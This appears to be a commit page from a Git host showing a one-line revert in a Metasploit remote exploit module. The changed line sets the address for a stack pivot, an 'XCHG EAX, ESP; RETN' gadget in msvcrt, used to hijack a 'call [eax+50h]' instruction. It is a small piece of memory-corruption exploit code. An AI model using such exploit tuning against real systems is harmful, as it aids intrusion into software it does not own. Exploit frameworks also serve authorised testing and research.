Full revert the change
parent
fa97c9fa7c
commit
0079413e81
|
@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Gain control of the call [eax+50h] instruction
|
# Gain control of the call [eax+50h] instruction
|
||||||
# XCHG EAX, ESP; RETN msvcrt
|
# XCHG EAX, ESP; RETN msvcrt
|
||||||
buf[0x4874, 4] = [0x12dd0700-0x50].pack('V')
|
buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
|
||||||
|
|
||||||
buf
|
buf
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue